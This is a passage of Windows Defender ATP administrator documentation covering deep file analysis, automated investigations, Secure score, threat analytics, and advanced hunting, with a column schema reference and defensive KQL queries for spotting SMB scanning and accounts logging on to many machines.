NOTE
The Action button is turned off for files signed by Microsoft to prevent negative impact on machines in your organization
caused by the removal of files that might be related to the operating system.

For prevalent files in the organization, a warning is shown before an action is implemented to validate that the
operation is intended.

Remove file from blocked list


1. Select the file you want to remove from the blocked list. You can select a file from any of the following
views or use the Search box:
Alerts - Click the file links from the Description or Details in the Artifact timeline
Search box - Select File from the drop-down menu and enter the file name
2. Open the Actions menu and select Remove file from blocked list.

3. Type a comment and select Yes to take action on the file. The file will be allowed to run in the
organization.

Check activity details in Action center


The Action center provides information on actions that were taken on a machine or file. You'll be able to view
the details of the last action that was taken on a file, such as stopped and quarantined files or blocked files.

Deep analysis
Cyber security investigations are typically triggered by an alert. Alerts are related to one or more observed files
that are often new or unknown. Clicking a file takes you to the file view where you can see the file's metadata. To
enrich the data related to the file, you can submit the file for deep analysis.
The deep analysis feature executes a file in a secure, fully instrumented cloud environment. Deep analysis results
show the file's activities, observed behaviors, and associated artifacts, such as dropped files, registry
modifications, and communication with IPs. Deep analysis currently supports extensive analysis of portable
executable (PE) files (including .exe and .dll files).
Deep analysis of a file takes several minutes. When the file analysis is complete, results are made available in the
File view page, under a new Deep analysis summary section. The summary includes a list of observed
behaviors, some of which can indicate malicious activity, and observables, including contacted IPs and files
created on the disk.
Results of deep analysis are matched against threat intelligence and any matches will generate appropriate
alerts.
Submit files for analysis
Use the deep analysis feature to investigate the details of any file, usually during an investigation of an alert or
for any other reason where you suspect malicious behavior. This feature is available in the context of the file
view.
In the file's page, Submit for deep analysis is enabled when the file is available in the Windows Defender ATP
backend sample collection or if it was observed on a Windows 10 machine that supports submitting to deep
analysis.

NOTE
Only files from Windows 10 can be automatically collected.

You can also manually submit a sample through the Malware Protection Center Portal if the file was not
observed on a Windows 10 machine, and wait for Submit for deep analysis button to become available.

NOTE
Due to backend processing flows in the Malware Protection Center Portal, there could be up to 10 minutes of latency
between file submission and availability of the deep analysis feature in Windows Defender ATP.

When the sample is collected, Windows Defender ATP runs the file in a secure environment and creates a
detailed report of observed behaviors and associated artifacts, such as files dropped on machines,
communication to IPs, and registry modifications.
Submit files for deep analysis:
1. Select the file that you want to submit for deep analysis. You can select or search a file from any of the
following views:
Alerts - click the file links from the Description or Details in the Artifact timeline
Machines list - click the file links from the Description or Details in the Machine in organization
section
Search box - select File from the drop-down menu and enter the file name
2. In the Deep analysis section of the file view, click Submit.
NOTE
Only PE files are supported, including .exe and .dll files.

A progress bar is displayed and provides information on the different stages of the analysis. You can then view
the report when the analysis is done.

NOTE
Depending on machine availability, sample collection time can vary. There is a 3-hour timeout for sample collection. The
collection will fail and the operation will abort if there is no online Windows 10 machine reporting at that time. You can
re-submit files for deep analysis to get fresh data on the file.

View deep analysis reports


View the deep analysis report that Windows Defender ATP provides to see the details of the deep analysis that
was conducted on the file you submitted. This feature is available in the file view context.
You can view the comprehensive report that provides details on the following sections:
Behaviors
Observables
The details provided can help you investigate if there are indications of a potential attack.
1. Select the file you submitted for deep analysis.
2. Click See the report below. Information on the analysis is displayed.
Troubleshoot deep analysis
If you encounter a problem when trying to submit a file, try each of the following troubleshooting steps.
1. Ensure that the file in question is a PE file. PE files typically have .exe or .dll extensions (executable programs
or applications).
2. Ensure the service has access to the file, that it still exists, and has not been corrupted or modified.
3. You can wait a short while and try to submit the file again, in case the queue is full or there was a temporary
connection or communication error.
4. If the sample collection policy is not configured, then the default behavior is to allow sample collection. If
it is configured, then verify the policy setting allows sample collection before submitting the file again.
When sample collection is configured, then check the following registry value:

Path: HKLM\SOFTWARE\Policies\Microsoft\Windows Advanced Threat Protection
Name: AllowSampleCollection
Type: DWORD
Hexadecimal value:
Value = 0 - block sample collection
Value = 1 - allow sample collection

5. Change the organizational unit through the Group Policy. For more information, see Configure with Group
Policy.
6. If these steps do not resolve the issue, contact winatp@microsoft.com.

Related topic
Take response actions on a machine
Overview of Automated investigations
4/5/2019 • 4 minutes to read

Want to experience Windows Defender ATP? Sign up for a free trial.

The Windows Defender ATP service has a wide breadth of visibility on multiple machines. With this kind of optics,
the service generates a multitude of alerts. The volume of alerts generated can be challenging for a typical
security operations team to individually address.
To address this challenge, Windows Defender ATP uses Automated investigations to significantly reduce the
volume of alerts that need to be investigated individually. The Automated investigation feature leverages various
inspection algorithms, and processes used by analysts (such as playbooks) to examine alerts and take immediate
remediation action to resolve breaches. This significantly reduces alert volume, allowing security operations
experts to focus on more sophisticated threats and other high value initiatives.
The Automated investigations list shows all the investigations that have been initiated automatically and shows
other details such as its status, detection source, and the date for when the investigation was initiated.

Understand the Automated investigation flow


How the Automated investigation starts
Entities are the starting point for Automated investigations. When an alert contains a supported entity for
Automated investigation (for example, a file) that resides on a machine that has a supported operating system for
Automated investigation then an Automated investigation can start.

NOTE
Currently, Automated investigation only supports Windows 10, version 1803 or later. Some investigation playbooks, like
memory investigations, require Windows 10, version 1809 or later.

The investigation starts by analyzing the supported entities from the alert and also runs a generic machine playbook to
see if there is anything else suspicious on that machine. The outcome and details of the investigation are shown in
the Automated investigation view.
Details of an Automated investigation
As the investigation proceeds, you'll be able to view the details of the investigation. Selecting a triggering alert
brings you to the investigation details view where you can pivot from the Investigation graph, Alerts,
Machines, Threats, Entities, and Log tabs.
In the Alerts tab, you'll see the alert that started the investigation.
The Machines tab shows where the alert was seen.
The Threats tab shows the entities that were found to be malicious during the investigation.
During an Automated investigation, details about each analyzed entity are categorized in the Entities tab. You'll be
able to see the determination for each entity type, such as whether it was determined to be malicious, suspicious,
or clean.
The Log tab reflects the chronological detailed view of all the investigation actions taken on the alert.
If there are pending actions on the investigation, the Pending actions tab will be displayed where you can
approve or reject actions.
How an Automated investigation expands its scope
While an investigation is running, any other alert generated from the machine will be added to an ongoing
Automated investigation until that investigation is completed. In addition, if the same threat is seen on other
machines, those machines are added to the investigation.
If an incriminated entity is seen in another machine, the Automated investigation will expand the investigation to
include that machine and a generic machine playbook will start on that machine. If 10 or more machines are
found during this expansion process from the same entity, then that expansion action will require an approval and
will be seen in the Pending actions view.
How threats are remediated
Depending on how you set up the machine groups and their level of automation, the Automated investigation will
either require user approval (default) or automatically remediate threats.
You can configure the following levels of automation:

AUTOMATION LEVEL | DESCRIPTION
Not protected | Machines will not get any automated investigations run on them.
Semi - require approval for any remediation | This is the default automation level. An approval is needed for any remediation action.
Semi - require approval for non-temp folders remediation | An approval is required on files or executables that are not in temporary folders. Files or executables in temporary folders, such as the user's download folder or the user's temp folder, will automatically be remediated if needed.
Semi - require approval for core folders remediation | An approval is required on files or executables that are in the operating system directories such as the Windows folder and the Program Files folder. Files or executables in all other folders will automatically be remediated if needed.
Full - remediate threats automatically | All remediation actions will be performed automatically.

For more information on how to configure these automation levels, see Create and manage machine groups.
The default machine group is configured for semi-automatic remediation. This means that any malicious entity
that needs to be remediated requires an approval, and the investigation is added to the Pending actions section.
This can be changed to fully automatic so that no user approval is needed.
When a pending action is approved, the entity is then remediated and this new state is reflected in the Entities
tab of the investigation.

Related topic
Learn about the automated investigations dashboard
Learn about the automated investigations dashboard
4/5/2019 • 6 minutes to read

By default, the Automated investigations list displays investigations initiated in the last week. You can also choose
to select other time ranges from the drop-down menu or specify a custom range.

NOTE
If your organization has implemented role-based access to manage portal access, only authorized users or user groups who
have permission to view the machine or machine group will be able to view the entire investigation.

Use the Customize columns drop-down menu to select columns that you'd like to show or hide.
From this view, you can also download the entire list in CSV format using the Export button, specify the number
of items to show per page, and navigate between pages. You also have the flexibility to filter the list based on your
preferred criteria.

Filters
You can use the following filters to customize the list of Automated investigations displayed:
Triggering alert
The alert that initiated the Automated investigation.
Status
An Automated investigation can be in one of the following statuses:

STATUS | DESCRIPTION
No threats found | No malicious entities found during the investigation.
Failed | A problem has interrupted the investigation, preventing it from completing.
Partially remediated | A problem prevented the remediation of some malicious entities.
Pending action | Remediation actions require review and approval.
Waiting for machine | Investigation paused. The investigation will resume as soon as the machine is available.
Queued | Investigation has been queued and will resume as soon as other remediation activities are completed.
Running | Investigation ongoing. Malicious entities found will be remediated.
Remediated | Malicious entities found were successfully remediated.
Terminated by system | Investigation was stopped by the system.
Terminated by user | A user stopped the investigation before it could complete.
Partially investigated | Entities directly related to the alert have been investigated. However, a problem stopped the investigation of collateral entities.

Detection source
Source of the alert that initiated the Automated investigation.
Threat
The category of threat detected during the Automated investigation.
Tags
Filter using manually added tags that capture the context of an Automated investigation.
Machines
You can filter the Automated investigations list to zoom in on a specific machine and see other investigations related to
the machine.
Machine groups
Apply this filter to see specific machine groups that you might have created.
Comments
Filter the list to show either Automated investigations that have comments or those that don't.

Analyze Automated investigations


You can view the details of an Automated investigation to see information such as the investigation graph, alerts
associated with the investigation, the machine that was investigated, and other information.
In this view, you'll see the name of the investigation, when it started and ended.
The progress ring shows two status indicators:
Orange ring - shows the pending portion of the investigation
Green ring - shows the running time portion of the investigation

In the example image, the automated investigation started at 10:26:59 AM and ended at 10:56:26 AM. Therefore,
the entire investigation ran for 29 minutes and 27 seconds.
The pending time of 16 minutes and 51 seconds reflects two possible pending states: pending for asset (for
example, the device might have disconnected from the network) or pending for approval.
From this view, you can also view and add comments and tags about the investigation.
Investigation page
The investigation page gives you a quick summary on the status, alert severity, category, and detection source.
You'll also have access to the following sections that help you see details of the investigation with finer granularity:
Investigation graph
Alerts
Machines
Threats
Entities
Log
Pending actions
NOTE
The Pending actions tab is only displayed if there are actual pending actions.

Pending actions history

NOTE
The Pending actions history tab is only displayed when an investigation is complete.

In any of the sections, you can customize columns to expand or limit the details you see in that section.
Investigation graph
The investigation graph provides a graphical representation of an Automated investigation. All investigation
related information is simplified and arranged in specific sections. Clicking on any of the icons brings you to the
relevant section where you can view more information.
Alerts
Shows details such as a short description of the alert that initiated the Automated investigation, severity, category,
the machine associated with the alert, user, time in queue, status, investigation state, and who the investigation is
assigned to.
Additional alerts seen on a machine can be added to an Automated investigation as long as the investigation is
ongoing.
Selecting an alert using the check box brings up the alert details pane, where you have the option of opening the
alert page, managing the alert by changing its status, and seeing alert details, Automated investigation details, the related
machine, logged-on users, and comments and history.
Clicking on an alert title brings you to the alert page.
Machines
Shows details such as the machine name, IP address, group, users, operating system, remediation level, investigation
count, and when it was last investigated.
Machines that show the same threat can be added to an ongoing investigation and will be displayed in this tab. If
10 or more machines are found during this expansion process from the same entity, then that expansion action will
require an approval and will be seen in the Pending actions view.
Selecting a machine using the checkbox brings up the machine details pane where you can see more information
such as machine details and logged-on users.
Clicking on a machine name brings you to the machine page.
Threats
Shows details related to threats associated with this investigation.
Entities
Shows details about entities such as files, processes, services, drives, and IP addresses. The table shows details such as the
number of entities that were analyzed. You'll gain insight into details such as how many are remediated, suspicious,
or determined to be clean.
Log
Gives a chronological detailed view of all the investigation actions taken on the alert. You'll see the action type,
action, status, machine name, description of the action, comments entered by analysts who may have worked on
the investigation, execution start time, duration, pending duration.
As with other sections, you can customize columns, select the number of items to show per page, and filter the log.
Available filters include action type, action, status, machine name, and description.
You can also click on an action to bring up the details pane where you'll see information such as the summary of
the action and input data.
Pending actions history
This tab is only displayed when an investigation is complete and shows all pending actions taken during the
investigation.

Pending actions
If there are pending actions on an Automated investigation, you'll see a pop-up similar to the following image.

When you click on the pending actions link, you'll be taken to the pending actions page. You can also navigate to
the page from the navigation pane by going to Automated investigation > Pending actions.
The pending actions view aggregates all investigations that require an action for an investigation to proceed or be
completed.

Use the Customize columns drop-down menu to select columns that you'd like to show or hide.
From this view, you can also download the entire list in CSV format using the Export feature, specify the number
of items to show per page, and navigate between pages.
Pending actions are grouped together in the following tabs:
Quarantine file
Remove persistence
Stop process
Expand pivot
Quarantine service

NOTE
The tab will only appear if there are pending actions for that category.

Approve or reject an action


You'll need to manually approve or reject pending actions on each of these categories for the automated actions to
proceed.
Selecting an investigation from any of the categories opens a panel where you can approve or reject the
remediation. Other details such as file or service details, investigation details, and alert details are displayed.

From the panel, you can click on the Open investigation page link to see the investigation details.
You also have the option of selecting multiple investigations to approve or reject their actions at once.

Related topic
Investigate Windows Defender ATP alerts
Overview of Secure score in Windows Defender
Security Center
4/22/2019 • 2 minutes to read

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)
The Secure score dashboard expands your visibility into the overall security posture of your organization. From
this dashboard, you'll be able to quickly assess the security posture of your organization, see machines that require
attention, as well as recommendations for actions to further reduce the attack surface in your organization - all in
one place. From there you can take action based on the recommended configuration baselines.

IMPORTANT
This feature is available for machines on Windows 10, version 1703 or later.

The Secure score dashboard displays a snapshot of:
Microsoft secure score
Secure score over time
Top recommendations
Improvement opportunities
Microsoft secure score
The Microsoft secure score tile is reflective of the sum of all the Windows Defender security controls that are
configured according to the recommended baseline and Office 365 controls. It allows you to drill down into each
portal for further analysis. You can also improve this score by configuring each of the security controls with the
optimal settings.

Each Windows Defender security control contributes 100 points to the score. The total number is reflective of the
score potential and calculated by multiplying the number of supported security controls (Windows Defender
security controls pillars) by the maximum points that each pillar contributes (maximum of 100 points for each
pillar).
The Office 365 Secure Score looks at your settings and activities and compares them to a baseline established by
Microsoft. For more information, see Introducing the Office 365 Secure Score.
In the example image, the total points for the Windows security controls and Office 365 add up to 602 points.
You can set the baselines for calculating the score of Windows Defender security controls on the Secure score
dashboard through the Settings. For more information, see Enable Secure score security controls.

Secure score over time


You can track the progression of your organizational security posture over time using this tile. It displays the
overall score in a historical trend line enabling you to see how taking the recommended actions increase your
overall security posture.
You can mouse over specific date points to see the total score on that date.

Top recommendations
Reflects specific actions you can take to significantly increase the security stance of your organization and how
many points will be added to the secure score if you take the recommended action.

Improvement opportunities
Improve your score by taking the recommended improvement actions listed on this tile. The goal is to reduce the
gap between the perfect score and the current score for each control.
Clicking on the affected machines link at the top of the table takes you to the Machines list. The list is filtered to
reflect the list of machines where improvements can be made.
Within the tile, you can click on each control to see the recommended optimizations.
Clicking the link under the Misconfigured machines column opens up the Machines list with filters applied to
show only the list of machines where the recommendation is applicable. You can export the list in Excel to create a
target collection and apply relevant policies using a management solution of your choice.

Related topic
Threat analytics
Threat analytics for Spectre and Meltdown
Threat analytics
4/22/2019 • 2 minutes to read

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)
Cyberthreats are emerging more frequently and prevalently. It is critical for organizations to be able to quickly
assess their security posture, including impact, and organizational resilience in the context of specific emerging
threats.
Threat Analytics is a set of interactive reports published by the Windows Defender ATP research team as soon as
emerging threats and outbreaks are identified. The reports help you assess the impact of threats in your
environment and provide recommended actions to contain and prevent specific threats and to increase organizational
resilience.

NOTE
The number of resolved alerts indicates how quickly your organization responds to alerts associated with a threat. Ideally, the
chart should be showing alerts being resolved within a few days.

Each threat report provides a summary to describe details such as where the threat is coming from, where it's been
seen, or techniques and tools that were used by the threat.
The dashboard shows the impact in your organization through the following tiles:
Machines with alerts - shows the current distinct number of impacted machines in your organization
Machines with alerts over time - shows the distinct number of impacted machines over time
Mitigation recommendations - lists the measurable mitigations and the number of machines that do not have
each of the mitigations in place
Mitigation status - shows the number of mitigated and unmitigated machines. Machines are considered
mitigated if they have all the measurable mitigations in place.
Mitigation status over time - shows the distinct number of machines that have been mitigated, unmitigated, and
unavailable over time
Organizational impact
You can assess the organizational impact of a threat using the Machines with alerts and Machines with alerts
over time tiles.
A machine is categorized as Active if there is at least 1 alert associated with that threat and Resolved if all alerts
associated with the threat on the machine are resolved.
The Machines with alerts over time tile shows the number of distinct machines with Active and Resolved alerts
over time. The number of resolved alerts indicates how quickly your organization responds to alerts associated
with a threat. Ideally, the chart should be showing alerts being resolved within a few days.

Organizational resilience
The Mitigation recommendations section provides specific actionable recommendations to improve your
visibility into this threat and increase your organizational resilience.
The Mitigation status and Mitigation status over time tiles show the endpoint configuration status assessed based
on the recommended mitigations.

IMPORTANT
The chart only reflects mitigations that are measurable and where an evaluation can be made on the machine state as
being compliant or non-compliant. There can be additional mitigations or compliance actions that currently cannot be
computed or measured that are not reflected in the charts and are covered in the threat description under Mitigation
recommendations section.
Even if all mitigations were measurable, there would be no absolute guarantee of complete resilience; the chart reflects the best
possible actions that need to be taken to improve resiliency.

NOTE
The Unavailable category indicates that there is no data available from the specific machine yet.

Related topics
Threat analytics for Spectre and Meltdown
Overview of advanced hunting
4/22/2019 • 2 minutes to read

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)
Advanced hunting allows you to hunt for possible threats across your organization using a powerful search and
query tool. You can also create custom detection rules based on the queries you created and surface alerts in
Windows Defender Security Center.
With advanced hunting, you can take advantage of the following capabilities:
Powerful query language with IntelliSense - Built on top of a query language that gives you the flexibility
you need to take hunting to the next level.
Query the stored telemetry - The telemetry data is accessible in tables for you to query. For example, you can
query process creation, network communication, and many other event types.
Links to portal - Certain query results, such as machine names and file names are actually direct links to the
portal, consolidating the Advanced hunting query experience and the existing portal investigation experience.
Query examples - A welcome page provides examples designed to get you started and get you familiar with
the tables and the query language.

In this section
TOPIC | DESCRIPTION
Query data using Advanced hunting | Learn how to use the basic or advanced query examples to search for possible emerging threats in your organization.
Custom detections | With custom detections, you can create custom queries to monitor events for any kind of behavior such as suspicious or emerging threats.
Query data using Advanced hunting in Windows
Defender ATP
4/5/2019 • 4 minutes to read

To get you started in querying your data, you can use the basic or Advanced query examples that have some
preloaded queries for you to understand the basic query syntax.

Use advanced hunting to query data


A typical query starts with a table name followed by a series of operators separated by |.
In the following example, we start with the table name ProcessCreationEvents and add piped elements as
needed.
First, we define a time filter to review only records from the previous seven days.
We then add a filter on the FileName to contain only instances of powershell.exe.
Afterwards, we add a filter on the ProcessCommandLine.
Finally, we project only the columns we're interested in exploring and limit the results to 100 and click Run query.
You have the option of expanding the screen view so you can focus on your hunting query and related results.
Use operators
The query language has many operators; some of the most useful for hunting are:
where - Filter a table to the subset of rows that satisfy a predicate.
summarize - Produce a table that aggregates the content of the input table.
join - Merge the rows of two tables to form a new table by matching values of the specified column(s) from
each table.
count - Return the number of records in the input record set.
top - Return the first N records sorted by the specified columns.
limit - Return up to the specified number of rows.
project - Select the columns to include, rename or drop, and insert new computed columns.
extend - Create calculated columns and append them to the result set.
makeset - Return a dynamic (JSON) array of the set of distinct values that an expression takes in the group.
find - Find rows that match a predicate across a set of tables.
To see a live example of these operators, run them as part of the Get started section.
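An added example (not from the original page) that exercises several of the operators listed above in a single query. It finds the accounts that logged on to the largest number of distinct machines over the last seven days, a common lateral-movement hunt. Column names come from the schema reference on this page; the seven-day window and the 20-row cut-off are this example's own choices.

```kusto
// Added example: where, summarize, count, makeset, extend, top and project in one hunt.
LogonEvents
| where EventTime > ago(7d)
// Aggregate per account. makeset keeps at most 128 values by default, so the
// machine count comes from dcount rather than from the size of the set.
| summarize LogonCount   = count(),
            MachineCount = dcount(ComputerName),
            Machines     = makeset(ComputerName),
            LogonTypes   = makeset(LogonType),
            FirstSeen    = min(EventTime),
            LastSeen     = max(EventTime)
    by AccountDomain, AccountName
// Derived columns: how long the account was active and how busy it was per machine.
| extend ActiveSpan       = LastSeen - FirstSeen,
         LogonsPerMachine = round(1.0 * LogonCount / MachineCount, 1)
// Accounts that touched the most machines first; drop the rest.
| top 20 by MachineCount desc
| project AccountDomain, AccountName, MachineCount, LogonCount, LogonsPerMachine,
          ActiveSpan, LogonTypes, Machines
```

A service account that legitimately touches every machine will sit at the top of this list; the LogonTypes column is what lets you separate it from an interactive account that is suddenly logging on to dozens of hosts.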

Access query language documentation


For more information on the query language and supported operators, see Query Language.

Use exposed tables in Advanced hunting


The following tables are exposed as part of Advanced hunting:
AlertEvents - Alerts on Windows Defender Security Center
MachineInfo - Machine information, including OS information
MachineNetworkInfo - Network properties of machines, including adapters, IP and MAC addresses, as well
as connected networks and domains
ProcessCreationEvents - Process creation and related events
NetworkCommunicationEvents - Network connection and related events
FileCreationEvents - File creation, modification, and other file system events
RegistryEvents - Creation and modification of registry entries
LogonEvents - Login and other authentication events
ImageLoadEvents - DLL loading events
MiscEvents - Multiple event types, such as process injection, creation of scheduled tasks, and LSASS access
attempts
These tables include data from the last 30 days.

Use shared queries


Shared queries are prepopulated queries that give you a starting point for running queries on your organization's
data. They include a couple of examples that demonstrate the query language capabilities.

You can save, edit, update, or delete queries.


Save a query
You can create or modify a query and save it as your own query or share it with users who are in the same tenant.
1. Create or modify a query.
2. Click the Save query drop-down button and select Save as.
3. Enter a name for the query.
4. Select the folder where you'd like to save the query.
Shared queries - Allows other users in the tenant to access the query
My query - Accessible only to the user who saved the query
5. Click Save.
Update a query
These steps guide you on modifying and overwriting an existing query.
1. Edit an existing query.
2. Click Save.
Delete a query
1. Right-click on a query you want to delete.

2. Select Delete and confirm that you want to delete the query.

Result set capabilities in Advanced hunting


The result set has several capabilities to provide you with effective investigation, including:
Columns that return entity-related objects, such as Machine name, Machine ID, File name, SHA1, User, IP, and
URL, are linked to their entity pages in Windows Defender Security Center.
You can right-click on a cell in the result set and add a filter to your written query. The current filtering options
are include, exclude or advanced filter, which provides additional filtering options on the cell value. These
cell values are part of the row set.

Filter results in Advanced hunting


In Advanced hunting, you can use the advanced filter on the output result set of the query. The filters provide an
overview of the result set where each column has its own section and shows the distinct values that appear in the
column and their prevalence.
You can refine your query based on the filter by clicking the "+" or "-" buttons on the values that you want to
include or exclude and click Run query.
The filter selections will resolve as an additional query term and the results will be updated accordingly.

Public Advanced hunting query GitHub repository


Check out the Advanced hunting repository. Contribute and use example queries shared by our customers.

Related topic
Advanced hunting reference
Advanced hunting query language best practices
Advanced hunting reference in Windows Defender ATP
4/16/2019 • 7 minutes to read

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)


Advanced hunting column reference


To effectively build queries that span multiple tables, you need to understand the columns in the Advanced hunting
schema. The following table lists all the available columns, along with their data types and descriptions. This
information is also available in the schema representation in the Advanced hunting screen.

COLUMN NAME | DATA TYPE | DESCRIPTION
AccountDomain | string | Domain of the account
AccountName | string | User name of the account
AccountSid | string | Security Identifier (SID) of the account
ActionType | string | Type of activity that triggered the event
AdditionalFields | string | Additional information about the event in JSON array format
AlertId | string | Unique identifier for the alert
AppGuardContainerId | string | Identifier for the virtualized container used by Application Guard to isolate browser activity
Category | string | Type of threat indicator or breach activity identified by the alert
ClientVersion | string | Version of the endpoint agent or sensor running on the machine
ComputerName | string | Fully qualified domain name (FQDN) of the machine
ConnectedNetworks | string | Networks that the adapter is connected to. Each JSON array contains the network name, category (public, private or domain), a description, and a flag indicating if it's connected publicly to the internet.
DefaultGateways | string | Default gateway addresses in JSON array format
DnsAddresses | string | DNS server addresses in JSON array format
EventTime | datetime | Date and time when the event was recorded
FileName | string | Name of the file that the recorded action was applied to
FileOriginIp | string | IP address where the file was downloaded from
FileOriginReferrerUrl | string | URL of the web page that links to the downloaded file
FileOriginUrl | string | URL where the file was downloaded from
FolderPath | string | Folder containing the file that the recorded action was applied to
InitiatingProcessAccountDomain | string | Domain of the account that ran the process responsible for the event
InitiatingProcessAccountName | string | User name of the account that ran the process responsible for the event
InitiatingProcessAccountSid | string | Security Identifier (SID) of the account that ran the process responsible for the event
InitiatingProcessCommandLine | string | Command line used to run the process that initiated the event
InitiatingProcessCreationTime | datetime | Date and time when the process that initiated the event was started
InitiatingProcessFileName | string | Name of the process that initiated the event
InitiatingProcessFolderPath | string | Folder containing the process (image file) that initiated the event
InitiatingProcessId | int | Process ID (PID) of the process that initiated the event
InitiatingProcessIntegrityLevel | string | Integrity level of the process that initiated the event. Windows assigns integrity levels to processes based on certain characteristics, such as whether they were launched from an internet download. These integrity levels influence permissions to resources.
InitiatingProcessLogonId | string | Identifier for a logon session of the process that initiated the event. This identifier is unique on the same machine only between restarts.
InitiatingProcessMd5 | string | MD5 hash of the process (image file) that initiated the event
InitiatingProcessParentCreationTime | datetime | Date and time when the parent of the process responsible for the event was started
InitiatingProcessParentId | int | Process ID (PID) of the parent process that spawned the process responsible for the event
InitiatingProcessParentFileName | string | Name of the parent process that spawned the process responsible for the event
InitiatingProcessSha1 | string | SHA-1 of the process (image file) that initiated the event
InitiatingProcessSha256 | string | SHA-256 of the process (image file) that initiated the event. This field is usually not populated; use the SHA1 column when available.
InitiatingProcessTokenElevation | string | Token type indicating the presence or absence of User Account Control (UAC) privilege elevation applied to the process that initiated the event
IPAddresses | string | JSON array containing all the IP addresses assigned to the adapter, along with their respective subnet prefix and IP address space, such as public, private, or link-local
Ipv4Dhcp | string | IPv4 address of the DHCP server
Ipv6Dhcp | string | IPv6 address of the DHCP server
IsAzureADJoined | boolean | Boolean indicator of whether the machine is joined to Azure Active Directory
IsAzureInfoProtectionApplied | boolean | Indicates whether the file is encrypted by Azure Information Protection
IsWindowsInfoProtectionApplied | boolean | Indicates whether Windows Information Protection (WIP) policies apply to the file
LocalIP | string | IP address assigned to the local machine used during communication
LocalPort | int | TCP port on the local machine used during communication
LocalIPType | string | Type of IP address, for example Public, Private, Reserved, Loopback, Teredo, FourToSixMapping, and Broadcast
LogonId | string | Identifier for a logon session. This identifier is unique on the same machine only between restarts.
LoggedOnUsers | string | List of all users that are logged on the machine at the time of the event, in JSON array format
LogonType | string | Type of logon session, specifically: Interactive (user physically interacts with the machine using the local keyboard and screen); Remote interactive (RDP) logons (user interacts with the machine remotely using Remote Desktop, Terminal Services, Remote Assistance, or other RDP clients); Network (session initiated when the machine is accessed using PsExec or when shared resources on the machine, such as printers and shared folders, are accessed); Batch (session initiated by scheduled tasks); Service (session initiated by services as they start)
MacAddress | string | MAC address of the network adapter
MachineGroup | string | Machine group of the machine. This group is used by role-based access control to determine access to the machine.
MachineId | string | Unique identifier for the machine in the service
MD5 | string | MD5 hash of the file that the recorded action was applied to
NetworkAdapterName | string | Name of the network adapter
NetworkAdapterStatus | string | Operational status of the network adapter. For the possible values, refer to this enumeration.
NetworkAdapterType | string | Network adapter type. For the possible values, refer to this enumeration.
OSArchitecture | string | Architecture of the operating system running on the machine
OSBuild | string | Build version of the operating system running on the machine
OSPlatform | string | Platform of the operating system running on the machine. This indicates specific operating systems, including variations within the same family, such as Windows 10 and Windows 7.
OsVersion | string | Version of the operating system running on the machine
PreviousRegistryKey | string | Original registry key of the registry value before it was modified
PreviousRegistryValueData | string | Original data of the registry value before it was modified
PreviousRegistryValueName | string | Original name of the registry value before it was modified
PreviousRegistryValueType | string | Original data type of the registry value before it was modified
ProcessCommandLine | string | Command line used to create the new process
ProcessCreationTime | datetime | Date and time the process was created
ProcessId | int | Process ID (PID) of the newly created process
ProcessIntegrityLevel | string | Integrity level of the newly created process. Windows assigns integrity levels to processes based on certain characteristics, such as whether they were launched from an internet download. These integrity levels influence permissions to resources.
ProcessTokenElevation | string | Token type indicating the presence or absence of User Account Control (UAC) privilege elevation applied to the newly created process
Protocol | string | IP protocol used, whether TCP or UDP
PublicIP | string | Public IP address used by the onboarded machine to connect to the Windows Defender ATP service. This could be the IP address of the machine itself, a NAT device, or a proxy.
RegistryKey | string | Registry key that the recorded action was applied to
RegistryValueData | string | Data of the registry value that the recorded action was applied to
RegistryValueName | string | Name of the registry value that the recorded action was applied to
RegistryValueType | string | Data type, such as binary or string, of the registry value that the recorded action was applied to
RemoteComputerName | string | Name of the machine that performed a remote operation on the affected machine. Depending on the event being reported, this name could be a fully qualified domain name (FQDN), a NetBIOS name, or a host name without domain information.
RemoteIP | string | IP address that was being connected to
RemoteIPType | string | Type of IP address, for example Public, Private, Reserved, Loopback, Teredo, FourToSixMapping, and Broadcast
RemotePort | int | TCP port on the remote device that was being connected to
RemoteUrl | string | URL or fully qualified domain name (FQDN) that was being connected to
ReportId | long | Event identifier based on a repeating counter. To identify unique events, this column must be used in conjunction with the ComputerName and EventTime columns.
Severity | string | Indicates the potential impact (high, medium, or low) of the threat indicator or breach activity identified by the alert
SensitivityLabel | string | Label applied to an email, file, or other content to classify it for information protection
SensitivitySubLabel | string | Sublabel applied to an email, file, or other content to classify it for information protection; sensitivity sublabels are grouped under sensitivity labels but are treated independently
SHA1 | string | SHA-1 of the file that the recorded action was applied to
SHA256 | string | SHA-256 of the file that the recorded action was applied to. This field is usually not populated; use the SHA1 column when available.
RegistryMachineTag | string | Machine tag added through the registry
Table | string | Table that contains the details of the event
TunnelingType | string | Tunneling protocol, if the interface is used for this purpose, for example 6to4, Teredo, ISATAP, PPTP, SSTP, and SSH


Related topic
Query data using Advanced hunting
Advanced hunting query language best practices
Advanced hunting query best practices in Windows Defender ATP
4/5/2019 • 3 minutes to read

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)


Performance best practices


The following best practices help you get faster results and run complex queries without hitting limits.
Use time filters first. Azure Kusto is highly optimized to utilize time filters. For more information, see Azure
Kusto.
Put the filters that are expected to remove most of the data at the beginning of the query, right after the time filter.
Use the 'has' keyword over 'contains' when looking for full tokens.
Filter on a specific column rather than using full-text search across all columns.
When joining two tables, choose the table with fewer rows as the first (left-most) one.
When joining two tables, project only the needed columns from both sides of the join.

Query tips and pitfalls


Unique Process IDs
Process IDs are recycled in Windows and reused for new processes, and therefore can't serve as a unique identifier
for a specific process. To address this issue, Windows Defender ATP records the process creation time alongside the
process ID. To get a unique identifier for a process on a specific machine, use the process ID together with the
process creation time.
So, when you join data based on a specific process or summarize data for each process, you'll need to use a
machine identifier (either MachineId or ComputerName), a process ID (ProcessId or InitiatingProcessId) and the
process creation time (ProcessCreationTime or InitiatingProcessCreationTime).
The following example query finds processes that access more than 10 IP addresses over port 445 (SMB),
possibly scanning for file shares.
Example query:

NetworkCommunicationEvents
| where RemotePort == 445 and EventTime > ago(12h) and InitiatingProcessId !in (0, 4)
| summarize RemoteIPCount=dcount(RemoteIP) by ComputerName, InitiatingProcessId,
InitiatingProcessCreationTime, InitiatingProcessFileName
| where RemoteIPCount > 10

The query summarizes by both InitiatingProcessId and InitiatingProcessCreationTime to make sure it looks at a
single process rather than mixing multiple processes that share the same process ID.
